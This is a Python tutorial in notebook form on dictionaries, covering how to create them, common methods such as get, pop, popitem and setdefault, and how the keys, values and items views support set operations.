# Section 03 - Dictionaries

##  Creating Python Dictionaries

There are different mechanisms available to create dictionaries in Python.

#### Literals

We can use a literal to create a dictionary:

In [1]:
a = {'k1': 100, 'k2': 200}

In [2]:
a

{'k1': 100, 'k2': 200}

Note that the order in which the items are listed in the literal is maintained when listing out the elements of the dictionary. Insertion order is a language guarantee from Python 3.7 onward (and an implementation detail of CPython 3.6); earlier versions do not preserve it.

Another thing to note is that dictionary **keys** must be hashable objects. Associated values on the other hand can be any object.

Tuples of hashable objects are themselves hashable, but lists are not, even if they contain only hashable elements. A tuple that contains a non-hashable element is not hashable either.

In [3]:
hash((1, 2, 3))

2528502973977326415

In [4]:
hash([1, 2, 3])

TypeError: unhashable type: 'list'

In [5]:
hash(([1, 2], [3, 4]))

TypeError: unhashable type: 'list'
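
If we want to test hashability without letting the exception escape, one option is to wrap the call to `hash` in a `try` block. This is only a minimal sketch, and `is_hashable` is a hypothetical helper name, not something built into Python:

```python
def is_hashable(obj):
    """Return True if hash(obj) succeeds, False if it raises TypeError."""
    try:
        hash(obj)
    except TypeError:
        return False
    return True


print(is_hashable((1, 2, 3)))         # tuple of hashable elements
print(is_hashable([1, 2, 3]))         # list
print(is_hashable(([1, 2], [3, 4])))  # tuple containing lists
```

Only the first call reports `True`, which matches the three `hash` calls above.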

So we can create dictionaries that look like this:

In [6]:
a = {('a', 100): ['a', 'b', 'c'], 'key2': {'a': 100, 'b': 200}}

In [7]:
a

{('a', 100): ['a', 'b', 'c'], 'key2': {'a': 100, 'b': 200}}

Interestingly, functions are hashable:

In [8]:
def my_func(a, b, c):
    print(a, b, c)

In [9]:
hash(my_func)

284093589

Which means we can use functions as keys in dictionaries:

In [10]:
d = {my_func: [10, 20, 30]}

A simple application of this might be to store the argument values we want to use to call the function at a later time:

In [11]:
def fn_add(a, b):
    return a + b

def fn_inv(a):
    return 1/a

def fn_mult(a, b):
    return a * b

In [12]:
funcs = {fn_add: (10, 20), fn_inv: (2,), fn_mult: (2, 8)}

Remember that when we iterate through a dictionary we are actually iterating through the keys:

In [13]:
for f in funcs:
    print(f)

<function fn_add at 0x10eeec8c8>
<function fn_inv at 0x10eeec6a8>
<function fn_mult at 0x10eeec620>


We can then call the functions this way:

In [14]:
for f in funcs:
    result = f(*funcs[f])
    print(result)

30
0.5
16


We can also iterate through the items (as tuples) in a dictionary as follows:

In [15]:
for f, args in funcs.items():
    print(f, args)

<function fn_add at 0x10eeec8c8> (10, 20)
<function fn_inv at 0x10eeec6a8> (2,)
<function fn_mult at 0x10eeec620> (2, 8)


So we could now call each function this way:

In [16]:
for f, args in funcs.items():
    result = f(*args)
    print(result)

30
0.5
16


#### Using the class constructor

We can also use the class constructor `dict()` in different ways:

##### Keyword Arguments

In [17]:
d = dict(a=100, b=200)

In [18]:
d

{'a': 100, 'b': 200}

The restriction here is that the key names must be valid Python identifiers, since they are being used as argument names.

We can also build a dictionary by passing it an iterable containing the keys and the values:

In [19]:
d = dict([('a', 100), ('b', 200)])

In [20]:
d

{'a': 100, 'b': 200}

The restriction here is that the elements of the iterable must themselves be iterables with exactly two elements.

In [21]:
d = dict([('a', 100), ['b', 200]])

In [22]:
d

{'a': 100, 'b': 200}
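
To make the "exactly two elements" restriction more concrete, here is a small sketch (the sample data is made up for illustration). A two-character string is itself an iterable with two elements, so it is accepted, while a three-element tuple is rejected with a `ValueError`:

```python
# Any iterable of two-element iterables works, including a two-character string
d = dict([('a', 100), ['b', 200], 'cd'])
print(d)  # {'a': 100, 'b': 200, 'c': 'd'}

# An element with three items cannot be split into a key and a value
try:
    dict([('a', 100, 'extra')])
except ValueError as ex:
    error = ex  # keep a reference, since `ex` is cleared after the except block
    print('ValueError:', ex)
```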

Of course we can also pass a dictionary as well:

In [23]:
d = {'a': 100, 'b': 200, 'c': {'d': 1, 'e': 2}}

Here I am using a dictionary that happens to contain a nested dictionary for the key `c`.

Let's look at the id of `d`:

In [24]:
id(d)

4545038016

And let's create a dictionary:

In [25]:
new_dict = dict(d)

In [26]:
new_dict

{'a': 100, 'b': 200, 'c': {'d': 1, 'e': 2}}

What's the id of `new_dict`?

In [27]:
id(new_dict)

4545071576

As you can see, we have a new object - however, what about the nested dictionary?

In [28]:
id(d['c']), id(new_dict['c'])

(4545357864, 4545357864)

As you can see they are the same - so be careful, using the `dict` constructor this way essentially creates a **shallow copy**.

We'll come back to copying dicts later.
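
In the meantime, here is a minimal sketch of why the distinction matters. It uses `copy.deepcopy` from the standard library as one way (an assumption on my part, not the only option) to get a fully independent copy:

```python
from copy import deepcopy

d = {'a': 100, 'c': {'d': 1, 'e': 2}}

shallow = dict(d)   # new outer dict, but the nested dict is shared
deep = deepcopy(d)  # nested dict is copied as well

# Mutating the nested dict through the shallow copy also affects the original
shallow['c']['d'] = 999

print(d['c']['d'])     # 999
print(deep['c']['d'])  # 1
```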

#### Using Comprehensions

We can also create dictionaries using a dictionary comprehension.
This is very similar to list comprehensions or generator expressions.

Suppose we have two iterables, one containing some keys, and one containing some values we want to associate with each key:

In [29]:
keys = ['a', 'b', 'c']
values = (1, 2, 3)

We can then easily create a dictionary this way - the non-Pythonic way!

In [30]:
d = {}  # creates an empty dictionary
for k, v in zip(keys, values):
    d[k] = v

In [31]:
d

{'a': 1, 'b': 2, 'c': 3}

But it is much simpler to use a dictionary comprehension:

In [32]:
d = {k: v for k, v in zip(keys, values)}

In [33]:
d

{'a': 1, 'b': 2, 'c': 3}

Dictionary comprehensions support the same syntax as list comprehensions - you can have nested loops, `if` statements, etc.

In [34]:
keys = ['a', 'b', 'c', 'd']
values = (1, 2, 3, 4)

d = {k: v for k, v in zip(keys, values) if v % 2 == 0}

In [35]:
d

{'b': 2, 'd': 4}

In the following example we are going to create a grid of 2D coordinate pairs, and calculate their distance from the origin:

In [36]:
x_coords = (-2, -1, 0, 1, 2)
y_coords = (-2, -1, 0, 1, 2)

If you remember list comprehensions, we would create all possible `(x,y)` pairs using nested loops (a Cartesian product):

In [37]:
grid = [(x, y) 
         for x in x_coords 
         for y in y_coords]
grid

[(-2, -2),
 (-2, -1),
 (-2, 0),
 (-2, 1),
 (-2, 2),
 (-1, -2),
 (-1, -1),
 (-1, 0),
 (-1, 1),
 (-1, 2),
 (0, -2),
 (0, -1),
 (0, 0),
 (0, 1),
 (0, 2),
 (1, -2),
 (1, -1),
 (1, 0),
 (1, 1),
 (1, 2),
 (2, -2),
 (2, -1),
 (2, 0),
 (2, 1),
 (2, 2)]

In [38]:
import math

We can use the `math` module's `hypot` function to calculate these distances:

In [39]:
math.hypot(1, 1)

1.4142135623730951

So to calculate these distances for all our points we would do this:

In [40]:
grid_extended = [(x, y, math.hypot(x, y)) for x, y in grid]
grid_extended

[(-2, -2, 2.8284271247461903),
 (-2, -1, 2.23606797749979),
 (-2, 0, 2.0),
 (-2, 1, 2.23606797749979),
 (-2, 2, 2.8284271247461903),
 (-1, -2, 2.23606797749979),
 (-1, -1, 1.4142135623730951),
 (-1, 0, 1.0),
 (-1, 1, 1.4142135623730951),
 (-1, 2, 2.23606797749979),
 (0, -2, 2.0),
 (0, -1, 1.0),
 (0, 0, 0.0),
 (0, 1, 1.0),
 (0, 2, 2.0),
 (1, -2, 2.23606797749979),
 (1, -1, 1.4142135623730951),
 (1, 0, 1.0),
 (1, 1, 1.4142135623730951),
 (1, 2, 2.23606797749979),
 (2, -2, 2.8284271247461903),
 (2, -1, 2.23606797749979),
 (2, 0, 2.0),
 (2, 1, 2.23606797749979),
 (2, 2, 2.8284271247461903)]

We can now easily tweak this to make a dictionary, where the coordinate pairs are the key, and the distance the value:

In [41]:
grid_extended = {(x, y): math.hypot(x, y) for x, y in grid}

In [42]:
grid_extended

{(-2, -2): 2.8284271247461903,
 (-2, -1): 2.23606797749979,
 (-2, 0): 2.0,
 (-2, 1): 2.23606797749979,
 (-2, 2): 2.8284271247461903,
 (-1, -2): 2.23606797749979,
 (-1, -1): 1.4142135623730951,
 (-1, 0): 1.0,
 (-1, 1): 1.4142135623730951,
 (-1, 2): 2.23606797749979,
 (0, -2): 2.0,
 (0, -1): 1.0,
 (0, 0): 0.0,
 (0, 1): 1.0,
 (0, 2): 2.0,
 (1, -2): 2.23606797749979,
 (1, -1): 1.4142135623730951,
 (1, 0): 1.0,
 (1, 1): 1.4142135623730951,
 (1, 2): 2.23606797749979,
 (2, -2): 2.8284271247461903,
 (2, -1): 2.23606797749979,
 (2, 0): 2.0,
 (2, 1): 2.23606797749979,
 (2, 2): 2.8284271247461903}
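
Once the distances are stored in a dictionary, looking them up or filtering on them is straightforward. The sketch below rebuilds the same dictionary using `itertools.product` (a swapped-in alternative to the nested loops above) and then picks out the points within a distance of 1 from the origin; the name `inside` is just for illustration:

```python
import math
from itertools import product

x_coords = (-2, -1, 0, 1, 2)
y_coords = (-2, -1, 0, 1, 2)

# product yields the same (x, y) pairs as the nested loops
grid_extended = {(x, y): math.hypot(x, y)
                 for x, y in product(x_coords, y_coords)}

# Direct lookup by coordinate pair
print(grid_extended[(1, 1)])

# Keep only the points at distance 1 or less from the origin
inside = {point for point, dist in grid_extended.items() if dist <= 1}
print(len(inside))  # 5
```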

#### Using `fromkeys`

The `dict` class also provides the `fromkeys` method that we can use to create dictionaries.
This class method is used to create a dictionary from an iterable containing the keys, and a **single** value used to assign to each key.

In [43]:
counters = dict.fromkeys(['a', 'b', 'c'], 0)

In [44]:
counters

{'a': 0, 'b': 0, 'c': 0}

If we do not specify a value, then `None` is used:

In [45]:
d = dict.fromkeys('abc')

In [46]:
d

{'a': None, 'b': None, 'c': None}

Notice how I used the fact that strings are iterables to specify the three single character keys for this dictionary!
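
Because `fromkeys` assigns the **same** object to every key, we need to be careful when that value is mutable. The following sketch (with made-up variable names) contrasts `fromkeys` with a dictionary comprehension, which creates a fresh list for each key:

```python
# Every key refers to the very same list object
shared = dict.fromkeys('abc', [])
shared['a'].append(1)
print(shared)  # {'a': [1], 'b': [1], 'c': [1]}

# A comprehension evaluates [] once per key, so the lists are independent
independent = {k: [] for k in 'abc'}
independent['a'].append(1)
print(independent)  # {'a': [1], 'b': [], 'c': []}
```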

The `fromkeys` method inserts the keys in the order in which they are retrieved from the iterable:

In [47]:
d = dict.fromkeys('python')

In [48]:
d

{'p': None, 'y': None, 't': None, 'h': None, 'o': None, 'n': None}

Be careful when reading dictionary output in Jupyter!
I've pointed this out a few times already, but depending on the version, Jupyter (this notebook) may use a printing mechanism that orders the keys alphabetically, in which case the displayed order will not match the insertion order.

To be sure we are seeing the real order of the keys in the dict, we should call the `print` function ourselves:

In [49]:
print(d)

{'p': None, 'y': None, 't': None, 'h': None, 'o': None, 'n': None}


Much better! :-)

##  Common Operations

You should already be aware of many of these, so I'll only spend time on some of the more interesting ones.

Dictionaries support the `len` function - this simply returns the number of key/value pairs in the dictionary:

In [1]:
d = dict(zip('abc', range(1, 4)))
d

{'a': 1, 'b': 2, 'c': 3}

In [2]:
len(d)

3

We can retrieve an element from a dictionary using `[]` notation, providing the key. If the key is not present we will get a `KeyError` exception:

In [3]:
d['a']

1

In [4]:
d['python']

KeyError: 'python'

Sometimes though, we do not want an exception to happen, and we want to provide some 'default' value instead.
We could certainly catch the exception, but that's clunky. Instead we can use the `get` instance method:

In [5]:
d.get('a')

1

In [6]:
result = d.get('python')
print(result)

None


As you can see, we do not get an exception, we simply get `None` back. We can actually specify the default to use when the key is not found:

In [7]:
d.get('python', 0)

0

This can be quite useful when we are using a dictionary to keep track of some count for different keys that are not known ahead of time (if they were, we could use `fromkeys` to initialize a dictionary with all the keys and initial values of `0`).

Let's see a simple example of this:

##### Example

Here we have a string where we want to count the number of each character that appears in the string.
Since we know the alphabet is a-z, we could create a dictionary with these initial keys - but maybe the string contains characters outside of that, maybe punctuation marks, emojis, etc. So it's not really feasible to take that approach.

In [8]:
text = 'Sed ut perspiciatis, unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam eaque ipsa, quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt, explicabo. Nemo enim ipsam voluptatem, quia voluptas sit, aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos, qui ratione voluptatem sequi nesciunt, neque porro quisquam est, qui dolorem ipsum, quia dolor sit amet consectetur adipisci[ng] velit, sed quia non-numquam [do] eius modi tempora inci[di]dunt, ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit, qui in ea voluptate velit esse, quam nihil molestiae consequatur, vel illum, qui dolorem eum fugiat, quo voluptas nulla pariatur?'
counts = dict()
for c in text:
    counts[c] = counts.get(c, 0) + 1
print(counts)

{'S': 1, 'e': 77, 'd': 22, ' ': 128, 'u': 69, 't': 65, 'p': 22, 'r': 38, 's': 43, 'i': 76, 'c': 19, 'a': 70, ',': 20, 'n': 37, 'o': 51, 'm': 43, 'v': 15, 'l': 33, 'q': 26, 'b': 5, 'h': 3, 'x': 3, '.': 2, 'N': 1, 'f': 2, 'g': 5, '[': 3, ']': 3, '-': 1, 'U': 1, '?': 2, 'Q': 1}


We can refine this a bit - first we'll ignore spaces, then we'll want to consider lowercase and uppercase characters as the same:

In [9]:
counts = dict()
for c in text:
    key = c.lower().strip()
    if key:
        counts[key] = counts.get(key, 0) + 1
print(counts)

{'s': 44, 'e': 77, 'd': 22, 'u': 70, 't': 65, 'p': 22, 'r': 38, 'i': 76, 'c': 19, 'a': 70, ',': 20, 'n': 38, 'o': 51, 'm': 43, 'v': 15, 'l': 33, 'q': 27, 'b': 5, 'h': 3, 'x': 3, '.': 2, 'f': 2, 'g': 5, '[': 3, ']': 3, '-': 1, '?': 2}
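
As an aside, the standard library's `collections.Counter` implements this counting pattern for us. The sketch below is not the approach used in this section; it simply checks, on a short hypothetical string standing in for `text`, that both approaches give the same counts:

```python
from collections import Counter

sample = 'Hello, World'  # hypothetical short string, standing in for `text`

# The manual approach, using get with a default of 0
manual = {}
for c in sample:
    key = c.lower().strip()
    if key:
        manual[key] = manual.get(key, 0) + 1

# Counter consumes an iterable and tallies each element
counted = Counter(c.lower() for c in sample if c.strip())

print(dict(counted) == manual)  # True
print(counted['l'])             # 3
```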


#### Membership Tests

We can use the `in` and `not in` operators to test the presence of a **key** in a dictionary:

In [10]:
d = dict(a=1, b=2, c=3)

In [11]:
'a' in d

True

In [12]:
'z' in d

False

In [13]:
'z' not in d

True

#### Removing elements from a dictionary

We can use the `del` statement to remove a key from a dictionary:

In [14]:
d = dict.fromkeys('abcd', 0)

In [15]:
d

{'a': 0, 'b': 0, 'c': 0, 'd': 0}

We can remove a key this way:

In [16]:
del d['a']

In [17]:
d

{'b': 0, 'c': 0, 'd': 0}

If the key is not present, we will get a `KeyError` exception:

In [18]:
del d['z']

KeyError: 'z'

Just as when retrieving elements, we may not want an exception to be raised when the key is missing - in which case we can use the `pop` instance method instead. There is also a related `popitem` method, which we'll look at right after.

Let's start with the `pop` method first.
We simply specify the **key** we want to remove from the dictionary. The `pop` method will not only remove the item (if the key is present), but also return the associated value:

In [19]:
d

{'b': 0, 'c': 0, 'd': 0}

In [20]:
result = d.pop('b')
result

0

In [21]:
d

{'c': 0, 'd': 0}

In [22]:
result = d.pop('z')

KeyError: 'z'

So we still get a `KeyError` exception!
To avoid this, we need to specify a **default** value to return if the key is not found:

In [23]:
result = d.pop('z', 'Not found!')
result

'Not found!'

The `popitem` method is similar, but it does not take a key: it simply removes an item from the dictionary and returns a **tuple** containing the key and the value that was just removed. If the dictionary is empty, it raises a `KeyError`.

Let's take a look at a simple example:

In [24]:
d = {'a': 10, 'b': 20, 'c': 30}

In [25]:
d.popitem()

('c', 30)

In [26]:
d.popitem()

('b', 20)

In [27]:
d.popitem()

('a', 10)

In [28]:
d.popitem()

KeyError: 'popitem(): dictionary is empty'

So one important thing to note here is the order in which the elements of the dictionary are popped - they are popped in reverse order from how they were inserted. As you can see above, `c` was inserted last, and hence was popped first.
This is called **LIFO** (last in, first out) order, and since dicts preserve insertion order, this LIFO order when popping is guaranteed as of Python 3.7.

**Earlier versions do not guarantee this order: `popitem` could return an arbitrary item.**
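
A common use of `popitem` is to consume a dictionary destructively, one item at a time. Here is a minimal sketch, assuming Python 3.7 or later so that the LIFO order holds; relying on the truthiness of the dictionary in the `while` condition means we never hit the `KeyError`:

```python
d = {'a': 10, 'b': 20, 'c': 30}

popped = []
while d:  # an empty dict is falsy, so the loop stops before popitem can fail
    popped.append(d.popitem())

print(popped)  # [('c', 30), ('b', 20), ('a', 10)]
print(d)       # {}
```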

#### Inserting keys with a default

Sometimes we may want to insert an element in a dictionary with a default value, but only if the element is not already present:

In [29]:
d = {'a': 1, 'b': 2, 'c': 3}

We could do it this way:

In [30]:
if 'z' not in d:
    d['z'] = 0

In [31]:
d

{'a': 1, 'b': 2, 'c': 3, 'z': 0}

We could write a simple utility function to do this for us, and return the value of the item as well while we're at it:

In [32]:
def insert_if_not_present(d, key, value):
    if key not in d:
        d[key] = value
        return value
    else:
        return d[key]

In [33]:
print(d)

{'a': 1, 'b': 2, 'c': 3, 'z': 0}


In [34]:
result = insert_if_not_present(d, 'a', 0)
print(result, d)

1 {'a': 1, 'b': 2, 'c': 3, 'z': 0}


In [35]:
result = insert_if_not_present(d, 'y', 10)
print(result, d)

10 {'a': 1, 'b': 2, 'c': 3, 'z': 0, 'y': 10}


But instead, we can simply use the `setdefault` instance method, which will do the work we just did:

In [36]:
d = {'a': 1, 'b': 2, 'c': 3}
result = d.setdefault('a', 0)
print(result)
print(d)

1
{'a': 1, 'b': 2, 'c': 3}


In [37]:
result = d.setdefault('z', 100)
print(result)
print(d)

100
{'a': 1, 'b': 2, 'c': 3, 'z': 100}


This is quite a useful method.
Let's take a look at that example we did earlier that looked at how many times each character occurred in a string:

In [38]:
text = 'Sed ut perspiciatis, unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam eaque ipsa, quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt, explicabo. Nemo enim ipsam voluptatem, quia voluptas sit, aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos, qui ratione voluptatem sequi nesciunt, neque porro quisquam est, qui dolorem ipsum, quia dolor sit amet consectetur adipisci[ng] velit, sed quia non-numquam [do] eius modi tempora inci[di]dunt, ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit, qui in ea voluptate velit esse, quam nihil molestiae consequatur, vel illum, qui dolorem eum fugiat, quo voluptas nulla pariatur?'
counts = dict()
for c in text:
    key = c.lower().strip()
    if key:
        counts[key] = counts.get(key, 0) + 1
print(counts)

{'s': 44, 'e': 77, 'd': 22, 'u': 70, 't': 65, 'p': 22, 'r': 38, 'i': 76, 'c': 19, 'a': 70, ',': 20, 'n': 38, 'o': 51, 'm': 43, 'v': 15, 'l': 33, 'q': 27, 'b': 5, 'h': 3, 'x': 3, '.': 2, 'f': 2, 'g': 5, '[': 3, ']': 3, '-': 1, '?': 2}


Suppose now that we just want a dictionary to track the uppercase, lowercase, and other characters in the string (i.e. kind of grouping the data by uppercase, lowercase, other) - again ignoring spaces:

In [39]:
import string
print(string.ascii_lowercase)
print(string.ascii_uppercase)

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ


Here's one approach we might take:

In [40]:
categories = {}
for c in text:
    if c != ' ':
        if c in string.ascii_lowercase:
            key = 'lower'
        elif c in string.ascii_uppercase:
            key = 'upper'
        else:
            key = 'other'
        if key not in categories:
            categories[key] = set()  # set we'll insert the value into
        
        categories[key].add(c)
for cat in categories:
    print(f'{cat}:', ''.join(categories[cat]))

upper: UQNS
lower: dlsumxihcfbapnroeqtvg
other: [?-].,


We can simplify this a bit using `setdefault`:

In [41]:
categories = {}
for c in text:
    if c != ' ':
        if c in string.ascii_lowercase:
            key = 'lower'
        elif c in string.ascii_uppercase:
            key = 'upper'
        else:
            key = 'other'
        categories.setdefault(key, set()).add(c)

for cat in categories:
    print(f'{cat}:', ''.join(categories[cat]))

upper: UQNS
lower: dlsumxihcfbapnroeqtvg
other: [?-].,


Just to clean things up a bit more, let's create a small utility function that will return the category key:

In [42]:
def cat_key(c):
    if c == ' ':
        return None
    elif c in string.ascii_lowercase:
        return 'lower'
    elif c in string.ascii_uppercase:
        return 'upper'
    else:
        return 'other'

In [43]:
categories = {}
for c in text:
    key = cat_key(c)
    if key:
        categories.setdefault(key, set()).add(c)

for cat in categories:
    print(f'{cat}:', ''.join(categories[cat]))

upper: UQNS
lower: dlsumxihcfbapnroeqtvg
other: [?-].,


If you are not a fan of using `if...elif...` in the `cat_key` function we could do it this way as well:

In [44]:
def cat_key(c):
    categories = {' ': None,
                 string.ascii_lowercase: 'lower',
                 string.ascii_uppercase: 'upper'}
    for key in categories:
        if c in key:
            return categories[key]
    else:
        return 'other'

In [45]:
cat_key('a'), cat_key('A'), cat_key('!'), cat_key(' ')

('lower', 'upper', 'other', None)

This approach is easier to extend without having a lot of `elif` statements, but for a few categories, I find the first implementation much clearer to read and understand.

In [46]:
categories = {}
for c in text:
    key = cat_key(c)
    if key:
        categories.setdefault(key, set()).add(c)

for cat in categories:
    print(f'{cat}:', ''.join(categories[cat]))

upper: UQNS
lower: dlsumxihcfbapnroeqtvg
other: [?-].,


We could also do it this way, creating a categories dictionary that has all the individual characters we are interested in:

In [47]:
from itertools import chain

def cat_key(c):
    cat_1 = {' ': None}
    cat_2 = dict.fromkeys(string.ascii_lowercase, 'lower')
    cat_3 = dict.fromkeys(string.ascii_uppercase, 'upper')
    categories = dict(chain(cat_1.items(), cat_2.items(), cat_3.items()))
    # categories = {**cat_1, **cat_2, **cat_3} - I'll explain this later
    return categories.get(c, 'other')

In [48]:
cat_key('a'), cat_key('A'), cat_key('!'), cat_key(' ')

('lower', 'upper', 'other', None)

In [49]:
categories = {}
for c in text:
    key = cat_key(c)
    if key:
        categories.setdefault(key, set()).add(c)
        
for cat in categories:
    print(f'{cat}:', ''.join(categories[cat]))

upper: UQNS
lower: dlsumxihcfbapnroeqtvg
other: [?-].,
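
The same `setdefault` pattern works for any kind of grouping, not just sets of characters. As a small sketch with made-up data, here we group words by their first letter, using a list as the default so that the order of the words is kept:

```python
words = ['apple', 'avocado', 'banana', 'blueberry', 'cherry']  # sample data

groups = {}
for word in words:
    # setdefault returns the existing list, or inserts and returns a new one
    groups.setdefault(word[0], []).append(word)

print(groups)
# {'a': ['apple', 'avocado'], 'b': ['banana', 'blueberry'], 'c': ['cherry']}
```

One thing to keep in mind is that the default (`[]` here) is created on every call, even when the key already exists, since arguments are evaluated before the method runs.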


#### Clearing All Items

If we want to remove all the keys in a dictionary, we can use the `clear` method:

In [50]:
d = {'a': 1, 'b': 2, 'c': 3}

In [51]:
d

{'a': 1, 'b': 2, 'c': 3}

In [52]:
d.clear()

In [53]:
d

{}

As you can see, Python dictionaries are extremely flexible and have all sorts of useful methods we can use to manipulate them.

##  Views: keys, values and items

We'll come back to these dictionary views in a lot more detail once we have studied sets, because they are closely related.

For now, let's just briefly look at the basics of these views.

Views are special objects that support iteration over the keys, values, and key/value pairs (items) in a dictionary; some of them also support set behavior.

A quick look at some common set operations:

In [1]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}

Unions:

In [2]:
s1 | s2

{1, 2, 3, 4}

Intersections:

In [3]:
s1 & s2

{2, 3}

Differences:

In [4]:
s1 - s2

{1}

In [5]:
s2 - s1

{4}

Now let's look at these views:

In [6]:
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'c': 30, 'd': 4, 'e': 5}

We can iterate over the keys of a dictionary using the dictionary's iterator directly, or via the `keys` view:

In [7]:
for key in d1:
    print(key)

a
b
c


In [8]:
for key in d1.keys():
    print(key)

a
b
c


We can iterate over just the values of the dictionary:

In [9]:
for value in d1.values():
    print(value)

1
2
3


and over the items, as tuples, of the dictionary:

In [10]:
for item in d1.items():
    print(item)

('a', 1)
('b', 2)
('c', 3)


We can also unpack the tuples directly while iterating:

In [11]:
for k, v in d1.items():
    print(k, v)

a 1
b 2
c 3


These views are iterables, not iterators:

In [12]:
keys = d1.keys()

In [13]:
list(keys)

['a', 'b', 'c']

In [14]:
list(keys)

['a', 'b', 'c']

As you can see we can iterate over and over on the same view.

The order in which keys, values and items are returned during iteration matches - as long as the dictionary has not changed in between.

So for example, the following expression will always evaluate to true:

In [15]:
list(d1.items()) == list(zip(d1.keys(), d1.values()))

True

Views are dynamic, in the sense that if something changes in the dictionary, the views immediately reflect the change - that's because the views do not themselves contain data, they simply have extra bits of functionality that uses the dictionary as the source of truth.

In [16]:
keys

dict_keys(['a', 'b', 'c'])

In [17]:
d1['z'] = 10

In [18]:
keys

dict_keys(['a', 'b', 'c', 'z'])

In [19]:
del d1['z']

In [20]:
keys

dict_keys(['a', 'b', 'c'])

Now, the interesting thing is that some of these views also exhibit set behaviors.

In [21]:
print(d1)
print(d2)

{'a': 1, 'b': 2, 'c': 3}
{'c': 30, 'd': 4, 'e': 5}


We can find all the keys that are in either `d1` or `d2` (the union):

In [22]:
print(type(d1.keys()), d1.keys())
print(type(d2.keys()), d2.keys())
union = d1.keys() | d2.keys()
print(type(union), union)

<class 'dict_keys'> dict_keys(['a', 'b', 'c'])
<class 'dict_keys'> dict_keys(['c', 'd', 'e'])
<class 'set'> {'a', 'b', 'e', 'c', 'd'}


One thing to really watch out for here: once we start performing set-like operations, the result is a true `set`, and although ordering in the views is guaranteed, ordering in the resulting sets is **not**, as you can see from the example above!

We can also find the keys that are in both `d1` and `d2`:

In [23]:
d1.keys() & d2.keys()

{'c'}

We can also find the keys that are only in `d1` but not in `d2`:

In [24]:
d1.keys() - d2.keys()

{'a', 'b'}

The same works with items as well:

In [25]:
d1.items() | d2.items()

{('a', 1), ('b', 2), ('c', 3), ('c', 30), ('d', 4), ('e', 5)}

You'll notice that `('c', 3)` and `('c', 30)` are distinct elements, hence they show up as individual elements in the result.

Values on the other hand are more problematic. Keys in a dictionary must be hashable, and set elements must also be hashable, so it's not a problem creating a set of keys for example. But what about values? These need not be unique or hashable. And items for that matter? The first element of the tuple must be hashable since it's the key, but the value?

In [26]:
d3 = {'a': [1, 2], 'b': [3, 4]}
d4 = {'b': [30, 40], 'c': [5, 6]}

In [27]:
d3.values()

dict_values([[1, 2], [3, 4]])

Can we perform some set operations on the values?

In [28]:
d3.values() | d4.values()

TypeError: unsupported operand type(s) for |: 'dict_values' and 'dict_values'

The answer is no, the `values` view does not behave like a set - it can't because there is no guarantee the values are unique and hashable.
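
If we happen to know that the values are hashable, we can still get set behavior by converting the views to sets ourselves. A minimal sketch, using hypothetical dictionaries with integer values (this would fail for `d3` and `d4` above, since lists are not hashable):

```python
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'c': 30, 'd': 4, 'e': 3}

# Explicit conversion: duplicates collapse and ordering is lost
all_values = set(d1.values()) | set(d2.values())
common_values = set(d1.values()) & set(d2.values())

print(all_values == {1, 2, 3, 4, 30})  # True
print(common_values)                   # {3}
```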

What's interesting though is that `items` does have unique elements (since the keys are unique), but the values may or may not be hashable, as in the example of `d3` and `d4`:

In [29]:
print(d3)
print(d4)

{'a': [1, 2], 'b': [3, 4]}
{'b': [30, 40], 'c': [5, 6]}


In [30]:
d3.items() | d4.items()

TypeError: unhashable type: 'list'

As you can see, `items` in this case also does not exhibit set-like capabilities.

But that's not always the case. Let's go back to our first example:

In [31]:
print(d1)
print(d2)

{'a': 1, 'b': 2, 'c': 3}
{'c': 30, 'd': 4, 'e': 5}


In [32]:
d1.items() | d2.items()

{('a', 1), ('b', 2), ('c', 3), ('c', 30), ('d', 4), ('e', 5)}

Aha! In this case `items` **does** behave like a set - that's because the values are all hashable!

That's all I'm going to cover for now on dictionary views, we'll come back to them in greater detail in the context of sets.

##### Example 1

Let's take a look at a practical example of using these views for something other than plain iteration:

Let's say we have two dictionaries, and we want to create a new dictionary that contains all the items whose keys are in both dictionaries.
We want the value in the new dictionary to be a tuple containing all the values from both dictionaries:

In [33]:
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'b': 2, 'c': 30, 'd': 4}

In [34]:
k1 = d1.keys()
k2 = d2.keys()
k1 & k2

{'b', 'c'}

So we have now identified the common keys, all that's left to do is build a dictionary from those keys and the corresponding values.

We can use a simple loop to do this:

In [35]:
new_dict = {}
for key in d1.keys() & d2.keys():
    new_dict[key] = (d1[key], d2[key])
print(new_dict)

{'b': (2, 2), 'c': (3, 30)}


But, a dictionary comprehension would be a better approach here:

In [36]:
new_dict = {key: (d1[key], d2[key]) for key in d1.keys() & d2.keys()}
print(new_dict)

{'b': (2, 2), 'c': (3, 30)}


##### Example 2

Let's tweak this a bit and generate a new dictionary, again containing just the common keys, but whose value is either the common value, or if the underlying dictionaries have different values for the same key, choose the values from the second dictionary, discarding the values from the first.

The approach is going to be almost identical to the previous example.

Let's just see which value we want to use for both cases (same values, different values):
* same values: pick value from `d1` or `d2` (since values are the same it does not matter)
* different values: pick value from `d2`

As you can see, in both cases we just need to pick the value in `d2`.

In [37]:
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'b': 2, 'c': 30, 'd': 4}
new_dict = {key: d2[key] for key in d1.keys() & d2.keys()}
print(new_dict)

{'b': 2, 'c': 30}


##### Example 3

For this example, suppose we have two dictionaries, and we want to identify items whose keys are **not** common to both dictionaries:

In [38]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'a': 10, 'b': 20, 'c': 30, 'e': 5}

As you can see from visual inspection, we want to end up with a dictionary that looks like this:

In [39]:
{'d': 4, 'e': 5}

{'d': 4, 'e': 5}

